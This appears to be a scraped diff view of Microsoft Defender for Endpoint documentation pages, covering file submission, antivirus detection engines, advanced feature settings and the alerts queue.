- - If you selected **File hash**, configure the following options:
- - In the empty box, enter the file hash value (for example, `2725eb73741e23a254404cc6b5a54d9511b9923be2045056075542ca1bfbf3fe`) and then press the ENTER key. Repeat this step as many times as necessary. To remove an entry from the flyout, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: next to the entry.
- - **The file should have been categorized as**: Select one of the following values:
- - **Malware** (false negative)
- - **Unwanted software**
- - **Clean** (false positive)
- - **Notes for Microsoft (optional)**: Enter an optional note.
- - **Share feedback and relevant content with Microsoft**: Read the privacy statement and then select this option.
-
- :::image type="content" source="../../media/unified-admin-submission-file-hash.png" alt-text="Screenshot showing how to submit files hashes.":::
-
- When you're finished in the **Submit items to Microsoft for review** flyout, select **Submit**.
-
-Back on the **Files** tab of the **Submissions** page, the submission is shown.
-
-To view the details of the submission, select the submission by clicking anywhere in the row other than the check box next to the **Submission name**. The details of the submission are in the details flyout that opens.
-
-## Report items to Microsoft from the Alerts page in the Defender portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Incidents & alerts** \> **Alerts**. Or, to go directly to the **Alerts** page, use <https://security.microsoft.com/alerts>.
-
-2. On the **Alerts** page, find the alert that contains the file you want to report. For example, you can select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**, and then select **Service sources** \> **Microsoft Defender for Endpoint**.
-
-3. Select the alert from the list by clicking anywhere in the row other than the check box next to the **Alert name** value.
-
-4. In the details flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: \> **Submit items to Microsoft for review**.
-
- :::image type="content" source="../../media/unified-admin-submission-alerts-queue.png" alt-text="Screenshot showing how to submit items from an alerts queue.":::
-
-5. The options that are available in the **Submit items to Microsoft for review** flyout that opens are basically same as described in the previous section.
-
- The only difference is an **Include alert story** option that you can select to attach a JSON file that helps Microsoft investigate the submission.
-
- :::image type="content" source="../../media/unified-admin-submission-alert-queue-flyout.png" alt-text="Screenshot showing how to specify a submission type and fill in required fields.":::
-
- When you're finished in the **Submit items to Microsoft for review** flyout, select **Submit**.
-
-The submission is available on the **Files** tab of the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=file>.
-
-## Related information
--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Microsoft Defender for Endpoint in Microsoft Defender XDR](../defender/microsoft-365-security-center-mde.md)-- [Address false positives/negatives](defender-endpoint-false-positives-negatives.md)-- [View and organize alerts queue in Microsoft Defender for Endpoint](alerts-queue.md)
security Adv Tech Of Mdav https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/adv-tech-of-mdav.md
- Title: Advanced technologies at the core of Microsoft Defender Antivirus
-description: Microsoft Defender Antivirus engines and advanced technologies
------ Previously updated : 02/28/2024--
-f1.keyboards: NOSCH
--
-# Advanced technologies at the core of Microsoft Defender Antivirus
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-Microsoft Defender Antivirus and the multiple engines that lead to the advanced detection and prevention technologies under the hood to detect and stop a wide range of threats and attacker techniques at multiple points, as depicted in the following diagram:
--
-Many of these engines are built into the client and provide advanced protection against most threats in real time.
-
-These next-generation protection engines provide [industry-best](/windows/security/threat-protection/intelligence/top-scoring-industry-antivirus-tests) detection and blocking capabilities and ensure that protection is:
--- **Accurate**: Threats both common and sophisticated, many which are designed to try to slip through protections, are detected and blocked.-- **Real-time**: Threats are prevented from getting on to devices, stopped in real-time at first sight, or detected and remediated in the least possible time (typically within a few milliseconds).-- **Intelligent**: Through the power of the cloud, machine learning (ML), and Microsoft's industry-leading optics, protection is enriched and made even more effective against new and unknown threats.-
-## Hybrid detection and protection
-
-Microsoft Defender Antivirus does hybrid detection and protection. What this means is, detection and protection occur on the client device first, and works with the cloud for newly developing threats, which results in faster, more effective detection and protection.
-
-When the client encounters unknown threats, it sends metadata or the file itself to the cloud protection service, where more advanced protections examine new threats on the fly and integrate signals from multiple sources.
-
-|On the client|In the cloud|
-|||
-|**Machine learning (ML) engine** <br/> A set of light-weight machine learning models make a verdict within milliseconds. These models include specialized models and features that are built for specific file types commonly abused by attackers. Examples include models built for portable executable (PE) files, PowerShell, Office macros, JavaScript, PDF files, and more.|**Metadata-based ML engine** <br/> Specialized ML models, which include file type-specific models, feature-specific models, and adversary-hardened [monotonic models](https://www.microsoft.com/security/blog/2019/07/25/new-machine-learning-model-sifts-through-the-good-to-unearth-the-bad-in-evasive-malware/), analyze a featurized description of suspicious files sent by the client. Stacked ensemble classifiers combine results from these models to make a real-time verdict to allow or block files pre-execution.|
-|**Behavior monitoring engine** <br/> The behavior monitoring engine monitors for potential attacks post-execution. It observes process behaviors, including behavior sequence at runtime, to identify and block certain types of activities based on predetermined rules.|**Behavior-based ML engine** <br/> Suspicious behavior sequences and advanced attack techniques are monitored on the client as triggers to analyze the process tree behavior using real-time cloud ML models. Monitored attack techniques span the attack chain, from exploits, elevation, and persistence all the way through to lateral movement and exfiltration.|
-|**Memory scanning engine** <br/> This engine scans the memory space used by a running process to expose malicious behavior that could be hiding through code obfuscation.|**Antimalware Scan Interface (AMSI)-paired ML engine** <br/> Pairs of client-side and cloud-side models perform advanced analysis of scripting behavior pre- and post-execution to catch advanced threats like fileless and in-memory attacks. These models include a pair of models for each of the scripting engines covered, including PowerShell, JavaScript, VBScript, and Office VBA macros. Integrations include both dynamic content calls and/or behavior instrumentation on the scripting engines.|
-|**AMSI integration engine** <br/> Deep in-app integration engine enables detection of fileless and in-memory attacks through [AMSI](/windows/desktop/AMSI/antimalware-scan-interface-portal), defeating code obfuscation. This integration blocks malicious behavior of scripts client-side.|**File classification ML engine** <br/> Multi-class, deep neural network classifiers examine full file contents, provides an extra layer of defense against attacks that require more analysis. Suspicious files are held from running and submitted to the cloud protection service for classification. Within seconds, full-content deep learning models produce a classification and reply to the client to allow or block the file.|
-|**Heuristics engine** <br/> Heuristic rules identify file characteristics that have similarities with known malicious characteristics to catch new threats or modified versions of known threats.|**Detonation-based ML engine** <br/> Suspicious files are detonated in a sandbox. Deep learning classifiers analyze the observed behaviors to block attacks.|
-|**Emulation engine** <br/> The emulation engine dynamically unpacks malware and examines how they would behave at runtime. The dynamic emulation of the content and scanning both the behavior during emulation and the memory content at the end of emulation defeat malware packers and expose the behavior of polymorphic malware.|**Reputation ML engine** <br/> Domain-expert reputation sources and models from across Microsoft are queried to block threats that are linked to malicious or suspicious URLs, domains, emails, and files. Sources include Windows Defender SmartScreen for URL reputation models and Defender for Office 365 for email attachment expert knowledge, among other Microsoft services through the Microsoft Intelligent Security Graph.|
-|**Network engine** <br/> Network activities are inspected to identify and stop malicious activities from threats.|**Smart rules engine** <br/> Expert-written smart rules identify threats based on researcher expertise and collective knowledge of threats.|
-
-For more information, see [Microsoft 365 Defender demonstrates 100 percent protection coverage in the 2023 MITRE Engenuity ATT&CK&reg; Evaluations: Enterprise](https://www.microsoft.com/security/blog/2023/09/20/microsoft-365-defender-demonstrates-100-percent-protection-coverage-in-the-2023-mitre-engenuity-attck-evaluations-enterprise/).
-
-## How next-generation protection works with other Defender for Endpoint capabilities
-
-Together with [attack surface reduction](/microsoft-365/security/defender-endpoint/overview-attack-surface-reduction), which includes advanced capabilities like hardware-based isolation, application control, exploit protection, network protection, controlled folder access, attack surface reduction rules, and network firewall, [next-generation protection](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows) engines deliver Microsoft Defender for Endpoint's prebreach capabilities, stopping attacks before they can infiltrate devices and compromise networks.
-
-As part of Microsoft's defense-in-depth solution, the superior performance of these engines accrues to the [Microsoft Defender for Endpoint](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint) unified endpoint protection, where antivirus detections and other next-generation protection capabilities enrich endpoint detection and response, automated investigation and remediation, advanced hunting, threat and vulnerability management, managed threat hunting service, and other capabilities.
-
-These protections are further amplified through [Microsoft Defender XDR](https://www.microsoft.com/security/business/siem-and-xdr/microsoft-defender-xdr), Microsoft's comprehensive, end-to-end security solution for the modern workplace. Through [signal-sharing and orchestration of remediation across Microsoft's security technologies](https://techcommunity.microsoft.com/t5/Security-Privacy-and-Compliance/Announcing-Microsoft-Threat-Protection/ba-p/262783), Microsoft Defender XDR secures identities, endpoints, email and data, apps, and infrastructure.
-
-## Memory protection and memory scanning
-
-Microsoft Defender Antivirus (MDAV) provides memory protection with different engines:
-
-|Client|Cloud|
-|:|:|
-|Behavior Monitoring|Behavior-based Machine Learning|
-|Antimalware Scan Interface(AMSI) integration|AMSI-paired Machine Learning|
-|Emulation|Detonation-based Machine Learning|
-|Memory scanning|N/A|
-
-An additional layer to help prevent memory-based attacks is to use the Attack Surface Reduction (ASR) rule ΓÇô **Block Office applications from injecting code into other processes**. For more information see, [Block Office applications from injecting code into other processes](attack-surface-reduction-rules-reference.md#block-office-applications-from-injecting-code-into-other-processes).
-
-## Frequently asked questions
-
-### How many malware threats does Microsoft Defender Antivirus block per month?
-
-[Five billion threats on devices every month](https://www.microsoft.com/en-us/security/blog/2019/05/14/executing-vision-microsoft-threat-protection/).
-
-### How does Microsoft Defender Antivirus memory protection help?
-
-See [Detecting reflective DLL loading with Windows Defender for Endpoint](https://www.microsoft.com/security/blog/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/) to learn about one way Microsoft Defender Antivirus memory attack protection helps.
-
-### Do you all focus your detections/preventions in one specific geographic area?
-
-No, we are in all the geographical regions (Americas, EMEA, and APAC).
-
-### Do you all focus on specific industries?
-
-We focus on every industry.
-
-### Do your detection/protection require a human analyst?
-
-When you're pen-testing, you should demand where no human analysts are engaged on detect/protect, to see how the actual antivirus engine (prebreach) efficacy truly is, and a separate one where human analysts are engaged.You can add [Microsoft Defender Experts for XDR](/microsoft-365/security/defender/dex-xdr-overview) a managed extended detection and response service to augment your SOC.
-
-The ***continuous iterative enhancement*** each of these engines to be increasingly effective at catching the latest strains of malware and attack methods. These enhancements show up in consistent [top scores in industry tests](/microsoft-365/security/defender/top-scoring-industry-tests), but more importantly, translate to [threats and malware outbreaks](https://www.microsoft.com/security/blog/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/) stopped and [more customers protected](https://www.microsoft.com/security/blog/2018/03/22/why-windows-defender-antivirus-is-the-most-deployed-in-the-enterprise/).
security Advanced Features https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/advanced-features.md
- Title: Configure advanced features in Microsoft Defender for Endpoint
-description: Turn on advanced features such as block file in Microsoft Defender for Endpoint.
-------- m365-security-- tier2-- Previously updated : 04/08/2024--
-# Configure advanced features in Defender for Endpoint
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)---
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-advancedfeats-abovefoldlink)
-
-Depending on the Microsoft security products that you use, some advanced features might be available for you to integrate Defender for Endpoint with.
-
-## Enable advanced features
-
-1. Log in to [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2077139) using an account with the Security administrator or Global administrator role assigned.
-
-2. In the navigation pane, select **Settings** \> **Endpoints** \> **Advanced features**.
-
-3. Select the advanced feature you want to configure and toggle the setting between **On** and **Off**.
-
-4. Select **Save preferences**.
-
-Use the following advanced features to get better protected from potentially malicious files and gain better insight during security investigations.
-
-## Live response
-
-Turn on this feature so that users with the appropriate permissions can start a live response session on devices.
-
-For more information about role assignments, see [Create and manage roles](user-roles.md).
-
-## Live response for servers
-
-Turn on this feature so that users with the appropriate permissions can start a live response session on servers.
-
-For more information about role assignments, see [Create and manage roles](user-roles.md).
-
-## Live response unsigned script execution
-
-Enabling this feature allows you to run unsigned scripts in a live response session.
-
-## Restrict correlation to within scoped device groups
-
-This configuration can be used for scenarios where local SOC operations would like to limit alert correlations only to device groups that they can access. By turning on this setting, an incident composed of alerts that cross-device groups will no longer be considered a single incident. The local SOC can then take action on the incident because they have access to one of the device groups involved. However, global SOC will see several different incidents by device group instead of one incident. We don't recommend turning on this setting unless doing so outweighs the benefits of incident correlation across the entire organization.
-
-> [!NOTE]
-> - Changing this setting impacts future alert correlations only.
->
-> - Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## Enable EDR in block mode
-
-Endpoint detection and response (EDR) in block mode provides protection from malicious artifacts, even when Microsoft Defender Antivirus is running in passive mode. When turned on, EDR in block mode blocks malicious artifacts or behaviors that are detected on a device. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post breach.
-
-## Autoresolve remediated alerts
-
-For tenants created on or after Windows 10, version 1809, the automated investigation, and remediation capability is configured by default to resolve alerts where the automated analysis result status is "No threats found" or "Remediated". If you don't want to have alerts auto resolved, you'll need to manually turn off the feature.
-
-> [!TIP]
-> For tenants created prior to that version, you'll need to manually turn this feature on from the [Advanced features](https://security.microsoft.com//preferences2/integration) page.
-
-> [!NOTE]
->
-> - The result of the auto-resolve action may influence the Device risk level calculation which is based on the active alerts found on a device.
-> - If a security operations analyst manually sets the status of an alert to "In progress" or "Resolved" the auto-resolve capability will not overwrite it.
-
-## Allow or block file
-
-Blocking is only available if your organization fulfills these requirements:
--- Uses Microsoft Defender Antivirus as the active antimalware solution and,-- The cloud-based protection feature is enabled-
-This feature enables you to block potentially malicious files in your network. Blocking a file will prevent it from being read, written, or executed on devices in your organization.
-
-To turn **Allow or block** files on:
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **General** \> **Advanced features** \> **Allow or block file**.
-
-1. Toggle the setting between **On** and **Off**.
-
- :::image type="content" source="../../media/alloworblockfile.png" alt-text="The Endpoints screen" lightbox="../../media/alloworblockfile.png":::
-
-1. Select **Save preferences** at the bottom of the page.
-
-After turning on this feature, you can [block files](respond-file-alerts.md#allow-or-block-file) via the **Add Indicator** tab on a file's profile page.
-
-## Hide potential duplicate device records
-
-By enabling this feature, you can ensure that you're seeing the most accurate information about your devices by hiding potential duplicate device records. There are different reasons duplicate device records might occur, for example, the device discovery capability in Microsoft Defender for Endpoint might scan your network and discover a device that's already onboarded or has recently been offboarded.
-
-This feature will identify potential duplicate devices based on their hostname and last seen time. The duplicate devices will be hidden from multiple experiences in the portal, such as, the Device Inventory, Microsoft Defender Vulnerability Management pages, and Public APIs for machine data, leaving the most accurate device record visible. However, the duplicates will still be visible in global search, advanced hunting, alerts, and incidents pages.
-
-This setting is turned on by default and is applied tenant wide. If you don't want to hide potential duplicate device records, you'll need to manually turn off the feature.
-
-## Custom network indicators
-
-Turning on this feature allows you to create indicators for IP addresses, domains, or URLs, which determine whether they'll be allowed or blocked based on your custom indicator list.
-
-To use this feature, devices must be running Windows 10 version 1709 or later, or Windows 11. They should also have network protection in block mode and version 4.18.1906.3 or later of the antimalware platform [see KB 4052623](https://go.microsoft.com/fwlink/?linkid=2099834).
-
-For more information, see [Manage indicators](manage-indicators.md).
-
-> [!NOTE]
-> Network protection leverages reputation services that process requests in locations that might be outside of the location you've selected for your Defender for Endpoint data.
-
-## Tamper protection
-
-During some kinds of cyber attacks, bad actors try to disable security features, such as antivirus protection, on your machines. Bad actors like to disable your security features to get easier access to your data, to install malware, or to otherwise exploit your data, identity, and devices. Tamper protection essentially locks Microsoft Defender Antivirus and prevents your security settings from being changed through apps and methods.
-
-For more information, including how to configure tamper protection, see [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md).
-
-## Show user details
-
-Turn on this feature so that you can see user details stored in Microsoft Entra ID. Details include a user's picture, name, title, and department information when investigating user account entities. You can find user account information in the following views:
--- Alert queue-- Device details page-
-For more information, see [Investigate a user account](investigate-user.md).
-
-## Skype for Business integration
-
-Enabling the Skype for Business integration gives you the ability to communicate with users using Skype for Business, email, or phone. This activation can be handy when you need to communicate with the user and mitigate risks.
-
-> [!NOTE]
-> When a device is being isolated from the network, there's a pop-up where you can choose to enable Outlook and Skype communications which allows communications to the user while they are disconnected from the network. This setting applies to Skype and Outlook communication when devices are in isolation mode.
-
-## Office 365 Threat Intelligence connection
-
-> [!IMPORTANT]
-> This setting was used when Microsoft Defender for Office 365 and Microsoft Defender for Endpoint were in different portals previously. After the convergence of security experiences into a unified portal that is now called Microsoft Defender XDR, these settings are irrelevant and don't have any functionality associated with them. You can safely ignore the status of the control until it is removed from the portal.
-
-This feature is only available if you have an active subscription for Office 365 E5 or the Threat Intelligence add-on. For more information, see the [Office 365 E5 product page](https://www.microsoft.com/microsoft-365/enterprise/office-365-e5?activetab=pivot:overviewtab).
-
-This feature enables you to incorporate data from Microsoft Defender for Office 365 into Microsoft Defender XDR to conduct a comprehensive security investigation across Office 365 mailboxes and Windows devices.
-
-> [!NOTE]
-> You'll need to have the appropriate license to enable this feature.
-
-To receive contextual device integration in Office 365 Threat Intelligence, you'll need to enable the Defender for Endpoint settings in the Security & Compliance dashboard. For more information, see [Threat investigation and response](/microsoft-365/security/office-365-security/office-365-ti).
-
-## Endpoint Attack Notifications
-
-[Endpoint Attack Notifications](/microsoft-365/security/defender-endpoint/endpoint-attack-notifications) enable Microsoft to actively hunt for critical threats to be prioritized based on urgency and impact over your endpoint data.
-
-For proactive hunting across the full scope of Microsoft Defender XDR, including threats that span email, collaboration, identity, cloud applications, and endpoints, [learn more](https://aka.ms/DefenderExpertsForHuntingGetStarted) about Microsoft Defender Experts.
-
-## Microsoft Defender for Cloud Apps
-
-Enabling this setting forwards Defender for Endpoint signals to Microsoft Defender for Cloud Apps to provide deeper visibility into cloud application usage. Forwarded data is stored and processed in the same location as your Defender for Cloud Apps data.
-
-> [!NOTE]
-> This feature will be available with an E5 license for [Enterprise Mobility + Security](https://www.microsoft.com/cloud-platform/enterprise-mobility-security) on devices running Windows 10, version 1709 (OS Build 16299.1085 with [KB4493441](https://support.microsoft.com/help/4493441)), Windows 10, version 1803 (OS Build 17134.704 with [KB4493464](https://support.microsoft.com/help/4493464)), Windows 10, version 1809 (OS Build 17763.379 with [KB4489899](https://support.microsoft.com/help/4489899)), later Windows 10 versions, or Windows 11.
-
-### Enable the Microsoft Defender for Endpoint integration from the Microsoft Defender for Identity portal
-
-To receive contextual device integration in Microsoft Defender for Identity, you'll also need to enable the feature in the Microsoft Defender for Identity portal.
-
-1. Sign in to the [Microsoft Defender for Identity portal](https://portal.atp.azure.com/) with a Global Administrator or Security Administrator role.
-
-2. Select **Create your instance**.
-
-3. Toggle the Integration setting to **On** and select **Save**.
-
-After completing the integration steps on both portals, you'll be able to see relevant alerts in the device details or user details page.
-
-## Web content filtering
-
-Block access to websites containing unwanted content and track web activity across all domains. To specify the web content categories you want to block, create a [web content filtering policy](https://security.microsoft.com/preferences2/web_content_filtering_policy). Ensure you've network protection in block mode when deploying the [Microsoft Defender for Endpoint security baseline](https://devicemanagement.microsoft.com/#blade/Microsoft_Intune_Workflows/SecurityBaselineSummaryMenu/overview/templateType/2).
-
-## Share endpoint alerts with Microsoft Purview compliance portal
-
-Forwards endpoint security alerts and their triage status to Microsoft Purview compliance portal, allowing you to enhance insider risk management policies with alerts and remediate internal risks before they cause harm. Forwarded data is processed and stored in the same location as your Office 365 data.
-
-After configuring the [Security policy violation indicators](/microsoft-365/compliance/insider-risk-management-settings#indicators) in the insider risk management settings, Defender for Endpoint alerts will be shared with insider risk management for applicable users.
-
-## Authenticated telemetry
-
-You can **Turn on** Authenticated telemetry to prevent spoofing telemetry into your dashboard.
-
-## Microsoft Intune connection
-
-Defender for Endpoint can be integrated with [Microsoft Intune](/intune/what-is-intune) to [enable device risk-based conditional access](/intune/advanced-threat-protection#enable-windows-defender-atp-in-intune). When you [turn on this feature](configure-conditional-access.md), you'll be able to share Defender for Endpoint device information with Intune, enhancing policy enforcement.
-
-> [!IMPORTANT]
-> You'll need to enable the integration on both Intune and Defender for Endpoint to use this feature. For more information on specific steps, see [Configure Conditional Access in Defender for Endpoint](configure-conditional-access.md).
-
-This feature is only available if you've the following prerequisites:
--- A licensed tenant for Enterprise Mobility + Security E3, and Windows E5 (or Microsoft 365 Enterprise E5)-- An active Microsoft Intune environment, with Intune-managed Windows devices [Microsoft Entra joined](/azure/active-directory/devices/concept-azure-ad-join/).-
-### Conditional Access policy
-
-When you enable Intune integration, Intune will automatically create a classic Conditional Access (CA) policy. This classic CA policy is a prerequisite for setting up status reports to Intune. It shouldn't be deleted.
-
-> [!NOTE]
-> The classic CA policy created by Intune is distinct from modern [Conditional Access policies](/azure/active-directory/conditional-access/overview/), which are used for configuring endpoints.
-
-## Device discovery
-
-Helps you find unmanaged devices connected to your corporate network without the need for extra appliances or cumbersome process changes. Using onboarded devices, you can find unmanaged devices in your network and assess vulnerabilities and risks. For more information, see [Device discovery](device-discovery.md).
-
-> [!NOTE]
-> You can always apply filters to exclude unmanaged devices from the device inventory list. You can also use the onboarding status column on API queries to filter out unmanaged devices.
-
-## Preview features
-
-Learn about new features in the Defender for Endpoint preview release. Try upcoming features by turning on the preview experience.
-
-You'll have access to upcoming features, which you can provide feedback on to help improve the overall experience before features are generally available.
-
-## Download quarantined files
-
-Backup quarantined files in a secure and compliant location so they can be downloaded directly from quarantine. The **Download file** button will always be available in the file page. This setting is turned on by default. [Learn more about requirements](respond-file-alerts.md#download-quarantined-files)
--
-## Streamlined connectivity during device onboarding (Preview)
-
-This setting will set the default onboarding package to 'streamlined' for applicable operating systems.
-
-You will still have the option to use the standard onboarding package within the onboarding page but you will need to specifically select it in the drop-down.
--
-## Related topics
--- [Update data retention settings](data-retention-settings.md)-- [Configure alert notifications](configure-email-notifications.md)
security Alerts Queue Endpoint Detection Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts-queue-endpoint-detection-response.md
- Title: Alerts queue in Microsoft Defender XDR-
-description: View and manage the alerts surfaced in Microsoft Defender XDR
-keywords:
------- m365-security-- tier1-- mde-edr- Previously updated : 02/15/2024---
-# Alerts queue in Microsoft Defender XDR
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Learn how you can view and manage the queue so that you can effectively investigate threats seen on entities such as devices, files, or user accounts.
-
-## In this section
-
-Topic|Description
-:|:
-[View and organize the Alerts queue](alerts-queue.md)|Shows a list of alerts that were flagged in your network.
-[Manage alerts](manage-alerts.md)|Learn about how you can manage alerts such as change its status, assign it to a security operations member, and see the history of an alert.
-[Investigate alerts](investigate-alerts.md)|Investigate alerts that are affecting your network, understand what they mean, and how to resolve them.
-[Investigate files](investigate-files.md)|Investigate the details of a file associated with a specific alert, behavior, or event.
-[Investigate devices](investigate-machines.md)|Investigate the details of a device associated with a specific alert, behavior, or event.
-[Investigate an IP address](investigate-ip.md)|Examine possible communication between devices in your network and external internet protocol (IP) addresses.
-[Investigate a domain](investigate-domain.md)|Investigate a domain to see if devices and servers in your network have been communicating with a known malicious domain.
-[Investigate a user account](investigate-user.md)|Identify user accounts with the most active alerts and investigate cases of potential compromised credentials.
security Alerts Queue https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts-queue.md
- Title: View and organize the Microsoft Defender for Endpoint Alerts queue
-description: Learn about how the Microsoft Defender for Endpoint alerts queues work, and how to sort and filter lists of alerts.
------- m365-security-- tier1-- mde-edr- Previously updated : 02/15/2024---
-# View and organize the Microsoft Defender for Endpoint Alerts queue
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-alertsq-abovefoldlink)
-
-The **Alerts queue** shows a list of alerts that were flagged from devices in your network. By default, the queue displays alerts seen in the last 7 days in a grouped view. The most recent alerts are shown at the top of the list helping you see the most recent alerts first.
-
-> [!NOTE]
-> The alerts are significantly reduced with automated investigation and remediation, allowing security operations experts to focus on more sophisticated threats and other high value initiatives. When an alert contains a supported entity for automated investigation (for example, a file) in a device that has a supported operating system for it, an automated investigation and remediation can start. For more information on automated investigations, see [Overview of Automated investigations](automated-investigations.md).
-
-There are several options you can choose from to customize the alerts view.
-
-On the top navigation you can:
--- Customize columns to add or remove columns-- Apply filters-- Display the alerts for a particular duration like 1 Day, 3 Days, 1 Week, 30 Days, and 6 Months-- Export the alerts list to excel-- Manage Alerts--
-## Sort and filter alerts
-
-You can apply the following filters to limit the list of alerts and get a more focused view of the alerts.
-
-### Severity
-
-Alert severity|Description
-|
-High <br> (Red)|Alerts commonly seen associated with advanced persistent threats (APT). These alerts indicate a high risk because of the severity of damage they can inflict on devices. Some examples are: credential theft tools activities, ransomware activities not associated with any group, tampering with security sensors, or any malicious activities indicative of a human adversary.
-Medium <br> (Orange)|Alerts from endpoint detection and response post-breach behaviors that might be a part of an advanced persistent threat (APT). These behaviors include observed behaviors typical of attack stages, anomalous registry change, execution of suspicious files, and so forth. Although some might be part of internal security testing, it requires investigation as it might also be a part of an advanced attack.
-Low <br> (Yellow)|Alerts on threats associated with prevalent malware. For example, hack-tools, non-malware hack tools, such as running exploration commands, clearing logs, etc., that often do not indicate an advanced threat targeting the organization. It could also come from an isolated security tool testing by a user in your organization.
-Informational <br> (Grey)|Alerts that might not be considered harmful to the network but can drive organizational security awareness on potential security issues.
-
-#### Understanding alert severity
-
-Microsoft Defender Antivirus and Defender for Endpoint alert severities are different because they represent different scopes.
-
-The Microsoft Defender Antivirus threat severity represents the absolute severity of the detected threat (malware), and is assigned based on the potential risk to the individual device, if infected.
-
-The Defender for Endpoint alert severity represents the severity of the detected behavior, the actual risk to the device but more importantly the potential risk to the organization.
-
-So, for example:
--- The severity of a Defender for Endpoint alert about a Microsoft Defender Antivirus detected threat that was prevented and did not infect the device is categorized as "Informational" because there was no actual damage.-- An alert about a commercial malware was detected while executing, but blocked and remediated by Microsoft Defender Antivirus, is categorized as "Low" because it may have caused some damage to the individual device but poses no organizational threat.-- An alert about malware detected while executing which can pose a threat not only to the individual device but to the organization, regardless if it was eventually blocked, may be ranked as "Medium" or "High".-- Suspicious behavioral alerts, which weren't blocked or remediated will be ranked "Low", "Medium" or "High" following the same organizational threat considerations.-
-### Status
-
-You can choose to filter the list of alerts based on their Status.
-
-> [!NOTE]
-> If you see an *Unsupported alert type* alert status, it means that automated investigation capabilities cannot pick up that alert to run an automated investigation. However, you can [investigate these alerts manually](../defender/investigate-incidents.md#alerts).
-
-### Categories
-
-We've redefined the alert categories to align to the [enterprise attack tactics](https://attack.mitre.org/tactics/enterprise/) in the [MITRE ATT&CK matrix](https://attack.mitre.org/). New category names apply to all new alerts. Existing alerts will keep the previous category names.
-
-### Service sources
-
-You can filter the alerts based on the following Service sources:
--- Microsoft Defender for Identity-- Microsoft Defender for Cloud Apps-- Microsoft Defender for Endpoint-- Microsoft Defender XDR-- Microsoft Defender for Office 365-- App Governance-- Microsoft Entra ID Protection-
-Microsoft Endpoint Notification customers can now filter and see detections from the service by filtering by _Microsoft Defender Experts_ nested under the _Microsoft Defender for Endpoint_ service source.
-
-> [!NOTE]
-> The Antivirus filter will only appear if devices are using Microsoft Defender Antivirus as the default real-time protection antimalware product.
-
-### Tags
-
-You can filter the alerts based on Tags assigned to alerts.
-
-### Policy
-
-You can filter the alerts based on the following policies:
-
-|Detection source|API value|
-|||
-|Third-party sensors|ThirdPartySensors|
-|Antivirus|WindowsDefenderAv|
-|Automated investigation|AutomatedInvestigation|
-|Custom detection|CustomDetection|
-|Custom TI|CustomerTI|
-|EDR|WindowsDefenderAtp|
-|Microsoft Defender XDR|MTP|
-|Microsoft Defender for Office 365|OfficeATP|
-|Microsoft Defender Experts|ThreatExperts|
-|SmartScreen|WindowsDefenderSmartScreen|
-
-### Entities
-
-You can filter the alerts based on Entity name or ID.
-
-### Automated investigation state
-
-You can choose to filter the alerts based on their Automated investigation state.
---
-## Related topics
--- [Manage Microsoft Defender for Endpoint alerts](manage-alerts.md)-- [Investigate Microsoft Defender for Endpoint alerts](investigate-alerts.md)-- [Investigate a file associated with a Microsoft Defender for Endpoint alert](investigate-files.md)-- [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md)-- [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md)-- [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md)-- [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security Amsi On Mdav https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/amsi-on-mdav.md
